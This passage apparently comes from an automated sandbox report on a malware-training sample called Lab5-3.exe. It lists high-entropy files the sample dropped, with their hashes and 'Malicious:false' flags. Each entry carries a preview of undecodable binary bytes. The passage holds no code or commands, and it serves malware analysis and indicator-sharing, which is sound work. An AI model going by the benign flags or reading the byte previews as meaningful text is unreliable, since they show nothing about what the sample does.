                                                                                                          SHA-256:A852882E235BFFEFEDF5D9CD6062CE3F22C38A6212A3D45D9BD0004117050F45
                                                                                                          SHA-512:22D8F51B3876B51AC1A0377323EFF9B9671AADF786C74831812C546A126ABC1C925EFC3BFD334688BC0924D492A79A78421AA5C418887B1A667999ECBEDB8399
                                                                                                          Malicious:false
                                                                                                          Preview:M.+....Q6.Jk..#.h^..1.n$HU.*..d./.4_D.r.V...#!.<..Y(w.H.H>.ON.r(...v.t.p.......#.......Q(.r......g..y9.!....9.J...5.!.3.v.~Ul..../K.@J).Pv.....u..oF...e.....+.9....Q.....U....Qu^.DQ.p..Tx..b...&.!.a..D....P.b7...7.4"..W.n.)e......^.lQ.....x.).......D0....B...z!........j.V.......L&...Pa...-.,..t...=...H.(.2....0.A%........]K.....Q).."..Z.h.%.....mv..+.c.iY.Ig8..5w;~..W.&.F..W....ot.C.'.mo.. ..TC..qqp!>mP..EZ...7..7.........&T.n..g..R.wt..].+p.P.."./[8.<...;.4...3....xz.1.K).Q..>.Z.....X....OUB.`[...K.5piM.T..~.1..}k.t..Y.?.3.0P...y...&.c._|.8l.....T.+.pJ.@....w.:.....Z........i.y.(...*...a{P..[..k9f....K.lpT..PX..9Nd.....O.p.j.ke-...$.d^j.s:X|1I.....C.ja.1..&.o.......iDs.......\J0.._.?}.DQ...7L..{!.\.%5.R_iNA...E."{.......zYq6.hP..O..E.K..[.A....v'...c7.;.j`.|....K.|.DB/.c......4LB#}...x. KN._......m.r.V.u6);.0....0.wzAh4..$....y....'.......<..U...G.1.....qV.'M..9...=J\.O.....Q".Z...n.b.ln..w..P..za...M.S...>.l../.[.]Nrp.C.5!....1^t,|N.xs
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.922267801386067
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:kY95b5xMajC+PkoP5+gHfUTid3hBaUoSGFcmeykEdEElU92i:kY95zMal8ohMGx0uKeY2ElUJ
                                                                                                          MD5:3304DD634A47D8AE140AAFAF143636B0
                                                                                                          SHA1:7F051734DDEC4425B3DC5206B0C4C3BD1B5A5E9D
                                                                                                          SHA-256:FE090A1CC612D9C5B14A0F1FA98FE11413F41BB379532E0935C47229E85D3CA0
                                                                                                          SHA-512:C35E01A94F33A2C224249DD4D42EA38348F3E69F7A7391810E1F2D9CCAFD945AD1DF45C80092643BF58DD865813AA4BCA0E151283F0A9E5D45295ABCD3C600F4
                                                                                                          Malicious:false
                                                                                                          Preview:.....;u....d.*.7...7...K..[.F...%..;P.ME.W.=Q.....M@`....5.@....:3..R*!a.r..4..O......:..9.ww.............O........0Y.jJg..6.uL(.d..^6..w.)^.G.z-...:..f......>.X.hM.....?'.o..(..u}.d.m.k...G..V.../..vx.....<Kf'.....*W.:..lF. Yb.v.I.d@./a(..3.........>h.t...$#..>..w..1.[^.}>.G...a...A....'U....O..`{^..]j.......7e...".F.{..W..P.%.....C.8..%.A.. .C.W,w<G%...R..+.a03o...0.s8..7L...,.z?.7o..u...Y1.=.,..4..z.$....Q..T1m.tu..........v.j.|x...........!..f.w8.JB~,.u7..#S..."hK........f.........2I.P7.........w.-.6qOC...).+%...4...a....O..M.*.rY...(.........?.\.JFk.`.R....p..........D......^.!Oh...}.".a....6..1...L.....uq.;.=..E.y.1.q/...#..._"..F4.......U......s.."}dh;.^....=c.8+....S.7.#.i.C.2.....f.,....\....BW.a.~...3.....2../......./.qa.#a:3.D.....3...m.0"Y..7.....S..f.I...|).uz.oF.&.F.v..a..},.A...i..i5...0.......C...@...=~.ZK.E.....{g..U...%2...Xhj..vlw.O................|."skw8j..rTO.=..C....".!.j..+.@.F..2.....yE:....=@7...{b......4C.P...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11296
                                                                                                          Entropy (8bit):7.984227109749274
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Qd6QszqwtY8tHECzjiDNQ07ZLVPtWwJOoHKnGRMckVyjKS+2uLgw3Sn+jKG40Cb:DNPHECzjeN9jPt2WMckVy1TuEw3S+jJs
                                                                                                          MD5:343C47282833401435CDE6834EBAC42B
                                                                                                          SHA1:B6502ADD8CB391C7E5777E841EAA5314DA2DE803
                                                                                                          SHA-256:B4A8C781AF4615C3A6854B9D5FC4BFF422E553E31E813D105D0A4FA54239A276
                                                                                                          SHA-512:6FB768A4126D3AD8DEA5EFFAB76A5688EE7E00DC21A6C5C81BF2E309EFABCDF0CD430F6BB2CF494C5081C2553FE9608C951FC6E4AA5E1969AF5E76D4C483E8A5
                                                                                                          Malicious:false
                                                                                                          Preview:.(......i..P..!C..G.n.K{.Q.p....3.".1....ye..20.r.q._.Q.0..e..&l.X....-..|@.0..3.q:..t.. a4X}S.w...Nr8....E\..I.%.~3....li.D.l......4l)3..;.'l..]...l.^d.?..Rp..)....#..?.............u...W.C4/8.i.....+.....+0.z..,.....s...0...=...s.Ql>`..Y...........5.j.PU..k.x.7.y5bf.....[...N...t...8.j_[..!..g....F..Y.{E....E..`>.U+!..=..I...?..x.FR.....Xh.Ga....Y.7.@.Z......!t].s........Z....Mx..=A..FmF.w.M......F......ld..[....|,eq...Y.Y..6~..r;...#"..f8.9..9....'....I<.O.......na.OL.u=?..O\9.%....l4.j;.'t..F../...B..,...Rv.J\;....^p....N.1ycg... (.{Ou.....,.S.....~..;..F.8.1..aP..vz..!..~..2.dV.........}X...:B.c.?x. b.3...D.tDrn].P....b..}w$>..H....c>.Y.......".<.,.\....e......=y......>.%..w.....BlO..5..D....\pS>.;.n...&.......r.y.......E....fx..x]...P.E.l5.jL..>4.e......ly..6...|u.nP .6.7y....)..)...].!r.tNZZ.0....p....)...R1<.A...R.m.[D.Rye...?....Dg..BC.=..4...>.....N.UeY8K....0}...........X.@..z...TSn.wL...(.Z.....G.4y.....]E.^^.|.....}>p..P......,.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9856
                                                                                                          Entropy (8bit):7.982271770709747
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:yY7nz3CtLPlZ5POmcDTarHVnjHp+4hgsTEryCrLdt0Cb:B7ghZkPc1nDpFhgs4PHdttb
                                                                                                          MD5:D9C1A1043A7B7C9EFD38200EAE3EC28F
                                                                                                          SHA1:88F3737F8705B96ECF13B2EE67EF429BF0C6FA51
                                                                                                          SHA-256:35421EABFAE2E14210F2DB7BAD5986804E861897A7AD3F839FEEABBECCFFCACB
                                                                                                          SHA-512:F080D27C1082C8CACFB481CEDCDFB05D3306AD8A1386FE04EFB156592FC9592BC6206918F3BD98CCACE9B7BBDE7647CFB2E296B797B4B038B59F0878CEA9505D
                                                                                                          Malicious:false
                                                                                                          Preview:,S.df. .).Z..ml..O.^>..!Y..f].d`(..@/k.{.9.6w}.x7......2....WP.2..v...)..E..o.seT.K..{..at..R#,.g.).. .y._^..D.....0.....?(....FN.Z..Y....:.=A...m......{...b..:..;....].....i...&xU.....).a.t.|+.\(R.|...jcu.; v.q....w2..K.p&.h.Vg5..A-......]..,...%a..w...M.W..(:..4..+.'kY.u.r...,m..{^M.m.B....x.7\Tg"..V..~..&.EAnF3:..o.R.z.."H.|.).....@6NN.Q.tF>n/^.<.!...N....'Y.72>.>...,......9.?3b$.9F.(.x8.2....f........y...d...>.j....<..l.&...z5F.Y......:..Q...-Q.E..y..w.{6.-0...r%.u.q.:n.a2D:C.e.v.sK..o...F..:KIM..T.b....{*E..X2.d....G.1T.O.[f5>....-...t...ZS.I.2....._.\.....p.Oa..z.....:4_.';.>...Q........]/....C.Ka.ny.S...O.....r.R1..9....._.!...#0#..j......Y.]!.Q..'W..a$]z...7.\8..$[..u.)E.:..]....507...g..i...L]$...2.. o...;..Qy..9e.kP3.r...).^............\.W..m.J.q-HW...!.....i.#....3..=,......i.M......].?.u..!NGm...r6....WC..G......I...]...&..S..x@.....}.$T.of..D}.V.Gbb......LQ..qGk..].....^.c.....'.I..dZ;K".{..X."'....~y.?MisJL...".).^.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6976
                                                                                                          Entropy (8bit):7.975249311075077
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:ZQGOlL66EobXSuTf8hPDZ7w0zE6s2kDKR0Cb:Z5OlRjScEO0zzs2kDKRtb
                                                                                                          MD5:7EED0F08C5772A571C4302CE742B5BA3
                                                                                                          SHA1:4DDE498F4069CF8EDE9E068495CE108E1EA156B7
                                                                                                          SHA-256:7A789033612DC50C66C466BD10518562F7B661C1F139A380C079FD7AC8F6AB35
                                                                                                          SHA-512:8511F57F8FC3A579F613413756E4FCAFF601F33D958E2C810CA0AFE8C9D6F2DEDF72F6F0C6A16F607558D43FAC13AEFF63ED41BDD82F08B68D675A545F122C32
                                                                                                          Malicious:false
                                                                                                          Preview:U8.r..#C....b....x...:E..5...jf.2...G#.gb..I W/.j!x..i....'.......E4`...sx..?v)...g....._.....[.Q....m.HC.k...K.}.-..W.-..e.m..$.'=D....%.l..p.....tV..({.,...d0x.yl.;.w..P.+...C...i....qY..2F}..= N.k.g..uBxi6.".U.....*...cs.....f..{..i.-qK1.5.u....j$.<....r.v.^.W......17qB...oT..,..,.........X...;.`.....A#..B.p!/#..L.....C.....,.....%....-..5...K.`.A.....-R.....,U.M.{].u.@|..yu...N|[.O>.[........k....R...|7......H......Aw....1..B>....qjt..`...e.W.QC9.E..n.o....Z..x.$....*V.........0...A.........E...M.3..vK...)...QU7@W._..5'F...../@....=6!.H.s./...V.>0(m..)5.qI.a.p".dd,..7...b...U&.........2.P.\.{....I...A.K.-`8.....................T...j......gC...*.ct.D....5F..%4S.S...]...Y]....0.8o..t.A.Vq..M......E........%.....-.P0........sVn...*.......Z..........j....0..F..}...S............'J..O^.X...[_\.B1..^......P.]$1f...B.......s<...s........w.j.....Y!..G.G}1....d..b.K..g....a......!.. n..l..f.}Z.'../~.."+..g..J.j.k.K...c.t] .?_...4..?..~. .
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9488
                                                                                                          Entropy (8bit):7.9815166216835065
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:TxvBdXXXw+DOTeeneRc1j1IkLikURudMn8UYBqLMUH50N0Cb:TNBdXX/gZeR6j1d/dtELbH50Ntb
                                                                                                          MD5:7F09CC07FA2CC23E772F17BF5DF87595
                                                                                                          SHA1:4EDECA9C83674E8B4A5C2322A63F324DAEFC056C
                                                                                                          SHA-256:0DC40AF118385F340A2E21ADB1280C376F7944D56B0146380610361BDF4F2F36
                                                                                                          SHA-512:F88D06D4E13C24CB1981060757CDA35C9754488413982BE59E65B3E7472D5EF33BECD1D0E9794F00F8D5597C0AD178D5C83EA8B8FC218BBE6C58C0EF82CA4B7B
                                                                                                          Malicious:false
                                                                                                          Preview:B^ ;........W..{q..cJ~&.lK7S....^..._66..........YL.M.Q.0(..5..F.3%..E..Dn..a......CGQ..>..+.d. ...C..k..p...S.......A.).t&....Gw..B.@!].....Z.E...+..c...N.l.......Z...mqE......Y...,. .....).O.U..U].....H..|.B.....D(H.`gW;y=bT.i.eM../&...]..<3...D..7$h......Ld.|.Ta..#..A.^.!..O....P.Q...DW2.M.D..Gf..?.....q..%.v.......E.g.D.......u..3.......6S8.r(.D.....0fr......~o.f"<.U.<ri.)+..D.>|-764..xf..0o.t.*..e...%`..B.|...U.].....oj*....q%..jl.%...o.y.B.q...].V./..E.|F..o.i.7...e....Pd*.d...Y..;...aA:.[.i.........u.&q.. .~..7..a.^..Y..+.....F.V..,,.Y{..l..kQk..su....<.......>.....,..-..#.......C.9.A...a.....9~..wa.>mK.uE.....s.}....K..g.:....L.q..Q..\z..".@?..t.^...\...B..A%...p ..l.......^W...x.X."J.x...Y.r...I........}.f........f.h..5...........c..>..."q.y.Y...h...(..%......J.w{./,*ht..i.[c......a.@.......)....&:. ..K...{......>.C......P.nJ.A....l.f.T....xE.6b``W....g ...:.V0.M,......"%.l.a.1Hv.T... $.$`.....Sg|..G...~...u.l..H..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4048
                                                                                                          Entropy (8bit):7.953473275396567
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:rtuu8DT0nsl+5skITNKx8umJgUDGx0uKeY2ElUJ:rtuPUKyskIpKMgUg0Cb
                                                                                                          MD5:9AFCA7FB9A2F03E242A2B2EAABB9DE6F
                                                                                                          SHA1:FF8B5A0E410B636A79B320F6A3AAB78E0BD1CB23
                                                                                                          SHA-256:AAB2DAE1623B88DFD918BEA1DC985FFE460660F0D40996C63E826812F4BB39EC
                                                                                                          SHA-512:F9D1FA5D1B9233DB1C265E0E25831CEDF7481327A3B4AA9095110525233EF62BA1B4FF58D46759286BAA9320DE0A6A5FF99206EEF2D4DA6CCDA42988907ADAAE
                                                                                                          Malicious:false
                                                                                                          Preview:".k.I";.U....i..d.....n.].hD..r.....F.(.8F.B...RW.W....=gfQ....&....A_.E.2(6.....l...`.i.~5......[......\.w..h.e.Q5.l.g.F........uH.h.=.t........v...........1D/.N...KR.X.......m....S.......9.q"-.^....=.m....j.!.VJ..EJ*...x.V.u..I.Z.....-.ad.Z5......y.9..o.k..wbD....q...w.. '.S..e.$...G.+m.'..v..L..[...N..D.R.*.N....O...."7mYi ?.%<..>j.7..b...k.-.....=M.6.:.....>..6..m.*r...6.S.....x..67....{u.>M.Y..&....H....7...fw.l=.../2..).L...<Ty..I..|...w..S..p.y.k......Cc...x..............X.....DB.../#...wg...*.S...b......._P..........Jv...zQh .v4y).:.<yZ.k..k.......a/.LoU|.Ep...W.....I.".*q1.?.)...8......=R..P6.w|.......h.H.....L...y..B...q.._...d..8.V.(..%.%`w.Y{.+h0!..=....^..-}J.gL}q..(.trF....C]....R .Y..>&~n8}c&.k...)..........p_-.JJq..i..'o...Z.w.oW..U..hY(..PP. ...Q........%.7...:..]....#.ay.:.yv$.. \wzw.=.;.....#...A...M..Gi..u.4.C..f..s.N.^.c...3...0.g&..5!.x*.P.....LHK..x].Ny. .^...S.&o2_v....[...L*.zE.r.X.}..u....5Z...".\..J..l.5....U.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.921768167078294
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7bjqvsL8G57hIHfUTid3hBaUoSGFcmeykEdEElU92i:XjydApGx0uKeY2ElUJ
                                                                                                          MD5:D8581020F0BFD9AB9F8D61D846BEDAC5
                                                                                                          SHA1:6F51AE207D26FB04B851CACBB7C991E29B712413
                                                                                                          SHA-256:5A05D2A32B05D309385B56332D6EEE58E5402C2D72BEAD3202383599928921D8
                                                                                                          SHA-512:E85B8DE020F50E372C749B232B2A0B50F763F73CFE3012F2C1FB473CB8BC55E99E98B9E541B404B76C7C2AAC5F60CECE527997A1F8F5B40425C489CF026C6C21
                                                                                                          Malicious:false
                                                                                                          Preview:Z....}r.......gF.4?3.........6H..N6.*f.$.7...#c-ri+.I... ..U..4..../.=t^u.=L.(..<.]@..o.3\.....[..i.<z.m.G..[U...L}&..H.0......../..w...8..-..Oc..r7....>.P.E...O46ga.Q.P.q.....=.O.H.^.....!.s..UJf.3.c..OO+kvh....f.M*.0s.+..-.\..+....%.=&g.'.?y.HZv.j..m8!.U..._..r......"`.......... v..b..}GV....FD....c.D<.....N..z...kA..I.E.t(....0.........|.hl.X...n9@..C..a..Q....Te.@..;eGU......"....^//.....O.y.....Z*...A.....\....J..lv..X.....{HS..!.....K..JJr..h...JxN..S.~+U5[... .H....u.U..o..wS..=D.w....A..A..r..4a.'m..R~}.F.P..~....R.....T...i..L..JN&..7.....y]#.C....8h.9.]....m.;.....N.......*._.D...\[K.M{[..M......j.m7......Z....q.4.bI..n.+.]....c.~...fCs:.-.:6...0c.....`d.@<..aL...o..q...Y.*....IVX&...~.z..).`uO.....B%..r....C}h.9c..L....t..>..<.z++u.&o.Y.-.~.+h}.[.}....0%P.F..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.906429118818479
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:v6nF5bbw99T3jHfUTid3hBaUoSGFcmeykEdEElU92i:vgnbbw/T3wGx0uKeY2ElUJ
                                                                                                          MD5:DBE9F401120AC910E54CABFF73898B93
                                                                                                          SHA1:329A7583983A89E7CFC65638DF66692579DD79A8
                                                                                                          SHA-256:1B7C966EEDEC235B2B26E3EB468D6FD50DB79E56B719C860709FD76EC79E1C49
                                                                                                          SHA-512:0CB1C97CB64C64D94B5A37BF9A4DD7FC1B9583D9569376D788CB728BBE8510A4709B40B3C63F7B94CA99E0C894858D4771BA4FD72FE4B20C1C38E9A2781E7EC4
                                                                                                          Malicious:false
                                                                                                          Preview:...4.......c..pLr....\....S.....$z....5F... .7..T.q\..........p......J..1.j....M.........`.u.$..z.h-.a{F.x.R...^..F:.!.r..Gx.-.P.\.D..[0VG..wV....O....M......E!7....`u.@.S9.-Q...K.....ba..O.J9.**d.....8.h_<(0.{...9o.X...{<h.......u.k..........Vd.AN.......u.E.(.+.4..8....)..j.S.Fm}.9....&_...f.I.V...q........sx4u...O....@..l.J..U.Jq....{...6Xv.js.-...l..n("F..6F..9j.F.X.x+..,.O...qB.....9..a.M.....)..m958W:.J.=x..h..w.....<.6..~.(....wd.)=...X.^.8d7.g.f...l.._Ve.%..X...x^..<T0....*=....C.$ .X.n.n...7.qkc..<......eMn.../R'.)hHg|.2O._T..H.....E.c./...pW..%G..[<.cCa.K.Z.I...6....4..r..qQ....aL.........tc....%.k.......,.Y.R.W...K].R. G..;........6....;W..O....-o...j.......[p..V.r..f4....1D=....#...%..;.6P........c.z..o~.......@\...Km....V.y.!...S.Rm.j.........N..Ze.Bg..*Lm)./o...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.920139778041272
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2pP+SZ58+LrXAhf2cwnv2KKc2jHfUTid3hBaUoSGFcmeykEdEElU92i:mWSDLXezwnuK2wGx0uKeY2ElUJ
                                                                                                          MD5:E922FB2E57DF3EC0A5449E5A6C858BEE
                                                                                                          SHA1:11CF31672EA79CB8426CF09E0D987677F99409FA
                                                                                                          SHA-256:B961D89F62A66DEC432D958F99D3FF65EC02C232F67524E98C8818EEB372FD1F
                                                                                                          SHA-512:D26A2BC5F9912D617535381059D57EA8177295DB6C76A2D24B990E8EAED6AC28E1576E8A33F98276B884C626EA1B33A96CA8135DBBD329CB71B27F03F49B4E2D
                                                                                                          Malicious:false
                                                                                                          Preview:.P}...~.wP....l.mUF..t....C).>.l.p..4..e......zu7..b.....F. $......r..|.PR.;.....3Z...k...Y...a....v..a.U@q.4... ..h.PO+...D.t..2.r....v.3.m....k...'../^I...8.....Cy.W....tsMgc..j.E.3......&.0#..].R.:..\^....P\.-...G.%ul...^.`.+..u....e.....^1HCm1.A,}.,....u...Z.3WR....>..5..Q....EEY..`?.....|....4.$T{....s........M^...lD..kE..C..E.C..{_.f.......%?.....Q.!....XeP...<.S]E......^..d.9.E....$\.9P.W.]I.-.H....V.,.J.....$<...W.:.m^.x.H/w.5Z...%o.9m..|...7...u.Ao.h.A.!X....M.....-|w..O...S..b.}.i..`.wX~/_..6.v....z..Q........l.E%.^.j...SSm.}`g1#.......+wK.E.....}5_.p.Ld.1.g....p..............5...Y.E...........- ..@x.}.....d....R?....<NU.6>\%.>[Y...j4.a.w...i...Ly...U^.l............(.NA..,..d.k.p..u*b.....4.....y.G1.M..R...I..H.M...,>NX..-...p[..=[a........5c.......bJ5.H}.p..N2.u.[..x....6.\4.,i.;.6p./.%.. .hQh~..nC..|._..8....8v%..k92...g.x_.ai$C...x.6V.{.m.g...7#..#5)..#....q.;Bc`.2.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2960
                                                                                                          Entropy (8bit):7.9398124646912915
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:jHoCh6q3ptYEfgRHXdHD0Prpoyi3fH+jMvpC+NHfUTid3hBaUoSGFcmeykEdEElk:cC3puztD0PrpoyARRmGx0uKeY2ElUJ
                                                                                                          MD5:5380A71BBCDB6BEE0BD723E3B408DF5C
                                                                                                          SHA1:BEB68332D958B9C2DBB9F2230D9DDA989607F74B
                                                                                                          SHA-256:EF8923528329C92AD1D4DF34555028D8DDF2DA5F5672F0B0723C817A4B9CB4C7
                                                                                                          SHA-512:AD2BA6E08990420D0C7B6609243F508EC6E979454CD86E00396C18533E20BAA5F9DCF6D8468ED19D3508FD6D0454A24D779F796ABFA03DB8CE911EB14E4D8B6E
                                                                                                          Malicious:false
                                                                                                          Preview:.N..[...G.........1.;....>.lD.'......$BE.......|.o...o.....p..Y.r.@._...3...5#.5...;2de......n.8.."</I..}t.\.[..yg..+&wn..x6.67P....].E.aQ..J.l..._.dE...p..z..+.,wt.....).{>3.X\....z.h..@.S..bYa.zyOA.#.rVT..~.....z.....m.#.....0..........Y^_;..".o....n...a...H.Q^..........[.....n..,nO..?4..SmU.L.~.s~.ZP....D...Z....)..{K4.4v...L...BgTR...../...~*.-....vY..\h.;]........:e.G.......6.4..W<k......8..D.>..`b.(X..C....c.;.f.E....tB.z.........X.... ...Eg.P...k.1.).:.....|J.....,c......5..O.r9k..J..5.....v...uYzz._f...r.}...g.,v.._-.7k........+h......+7.%.*/..>.a..>T!....c.D..n.S...tn.l9n..OoD_6..t.}b8.).......`U.q.y.....]..,........C7.jf..........&...xK...6..:A...q5.>*.`q.MC...R..#.....tu....2...>.u..~$.3.L.L..I..R.....6...*q...]i..U%.V....z.$..a..._.q2z.e'.......2. R.X..k...]..Q..)..'i......\N.0f...!..\..a......z.^G.JO..S.Xv.......rec..~.5..H....t..i.J."..3..5.W...#...]j..tHR.l......X..F[....1k....@(G_...>..}gCE.c`.."....B....M.K%
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.924747417639559
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:UYW4XsMPVhAlWzHfUTid3hBaUoSGFcmeykEdEElU92i:NW4sMPUWAGx0uKeY2ElUJ
                                                                                                          MD5:F2BA14357790DC9FF65F5D806629AFAF
                                                                                                          SHA1:1F3DCFFE606705274100E7CB6E63246FFE1C251B
                                                                                                          SHA-256:90765D34927549B290D366CD0B7058D0A37D66E125FADA30B1F9D36B1D2D5973
                                                                                                          SHA-512:99FBB65B5D722FA31B3507B6733F2C2B2DC7F2137262CDF921906139D4AB6016B700523A6AD7C353205D54AF135103500288FECA4161609990171010812EFC41
                                                                                                          Malicious:false
                                                                                                          Preview:1o..!d6sq.m.xO...t7.........u0fi...Y.8 $...C,...?.....W..h..1j{4.kOp.N....x...d.JoE../.X...(.2. .........OG.,c8,..m.....YWlx....D.....BJ@2j.).5.....0.b).lrx(.....4...,..#......!&bQ.y..Z........KA:4..*.zZ...... I..(...V.|2}g.!..9..m......Jpc1..P....;..[......c..l../p6...H........km.>m.(...z*...K.e.1..S.CXV..o...]..Es..OC.>+u%..F..~.."..3..0..'.].+o}$.b.....gS.N..:&M.<h.j).U..\p.#;*...T..R./s.iP+.G..J]..|.o.......K.......G..q...X...OR~....p..1.......N......j...*....g..I.eK.._U.W). .Y.{.q.)./...>.7O.g6..m'.<....T.......O.....NJ.......Kcc......:~....!=N.. *...y.`F.s.#.]1.P[r.2."?:.&gd ..a..\&...5.z.....F.6.Pi$..*..c|.G...\.u#...s.1Y+...hC....b.._....k.....g.6e.]....`!/.K.y.B,i.....WG...i.F$..9..y&r.d.x.w.)..aW.......P.'..l..M......d&3j:e.......nH...r.2O#.Ji.6.m....HK.fz...U...h.n......T@C...YQ..3U'5..q........u_V...L..E..|.H..H.Q...cSV........8...*TVL....n=.9Y...oV.1.........r.'|...^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2368
                                                                                                          Entropy (8bit):7.914407831830149
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7VRKdqKGM7XucTnF8d0eHfUTid3hBaUoSGFcmeykEdEElU92i:7Vl87tFTxGx0uKeY2ElUJ
                                                                                                          MD5:C92A0A123073451908A081B18EE93ED6
                                                                                                          SHA1:15DD71AFE7D6DC42208FB675AD95C3D33ECE2C3C
                                                                                                          SHA-256:1BE8A67425D704E3580E5D8425B11DC7F8DA9C69550E9A4D2C4257C68C1FAAB3
                                                                                                          SHA-512:04063D35E6D0F8EC373FFF0E3C2D064CD98FD7FC5C5D63B214EDF80E69AD0BF2ADF5AB7AC3D927DC06FA833285385DBBFF95F697FAD56E6665471590FC3B58DA
                                                                                                          Malicious:false
                                                                                                          Preview:.,...'^.n.+.........In.L...b...._u.."....-...4..~uD.+M..b..\..9`..LX......<.p....2.8....}-a0.".o"...."A.D..l.V.n.`w.G........}.....y>.S...p6)...wf..b>|R(Z*|b...1\....-....c.....Js....@_+.hD.d.}..x....M...}.4...6..G.Jn..........~(u..~|iX#I1.!......*!_.W.W....H....=.....ng....6.uIx.%.....h.\.-....CN?.h....\....R..".P|......L....B..|.........7....u....u..x......9.......Y.+a....W,;..E}..%..O.q..\.SG.[W.....m..C.QO....+/.Ke..8......N.{F._Q?.:.o..v........g.../.f{.a...^p..r.L...k.T.|..Q...|.....T.#./....X.|. .g ..D....8i^o.h.@l.....IR.*.....`.S^C.,E.3#..).;q1.G.}../..+6.y...%ij.s...'_.3./...9..@QTB....u.O..T...y2xM...?...6/..W...T;..R.'M..A`..........VR./i.D.,..|V.GB.G.Q..7.9...?V.8..r....a.I....W..y...3f..d.^D.Q...&;V48...wCE....O.G...P..C..........k....fp...r7.$.k....<.Z.P.......L..Lh(...tMT.].....f.....E._.|Vj....0!F[..G.....+.. ^....$....z..P_.[.D..(B.?..G|./..i.g..t7.l+.-.......q+.D...Z.u?.^.&...]..Z..U...`..#....o......{Fl.=6
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2208
                                                                                                          Entropy (8bit):7.918171835919577
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:69OyzVDmhQ1NGsHfUTid3hBaUoSGFcmeykEdEElU92i:69OOmG1ArGx0uKeY2ElUJ
                                                                                                          MD5:825C6547903EDA18216021C39D1A2196
                                                                                                          SHA1:5534ABE6CFC987C5E1116FCE2C92C0E6DE741C11
                                                                                                          SHA-256:72066474E85ADA8C8BBD6FC6DFEAEEB0A512BCCF889B5FC67C1F8CE3B2CCB101
                                                                                                          SHA-512:A80E2A003836AB79069248647D8894983662B0E2FB41D916BE47B2407EB1B80F44D9513AE6F378F9737F0CBDAAC3DC3BDB0A697C3788D59C1F5BC249E87A8720
                                                                                                          Malicious:false
                                                                                                          Preview:....v...1Z..{......i.?.d.,...(S/IE...Vewdb.<......./y.QCU....=..bVi7........k~4'..O...6..b...T..K.......pIex.Co.oF..O..G..;.>.....*.vH.A(.0.G:..M..w-FL9.+..)..+..n.Y2Kh....@...O.......b.....i.l/.<..e....m.,Q...F.}.lX...z...s....y^.....PRDL.......O...D..}. .......3z....~..*..^..mxrg+.....b.q..<|S.9.,G.g..2...z..EK.o..'.m.....m....f....z..P.v7..*x..4.d.l..I..j..#j.H2.\<e3bY.2%.CY..h.......u....S3........eR...@.....6.rR...\eE..-.y..2il.Eh...c......W.[......>.w6]...|Q.........:..6.7'..GA%.\...N.3...'>.......1.....[).'o......cu..T...>$w.....2...R9Z.....bLk.J..?.6.7...\.h...!i].8q.i.T....e..3M@.......LND.z|....e<*....B.pD{....F<}J.6:.....&.JA%1..<.......c..).:.n;....H.R.4.gSI....P...kZQ.cs...U......gi..f. ~>......m...f.@.M...3S...........*.U..-G.;.....d....q..... ....7B.R:....i...vE..h.....8.t........1......PB..E..{.....4k.d...{........ge.....hC.W...R=^..4..x..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2208
                                                                                                          Entropy (8bit):7.9105787177685
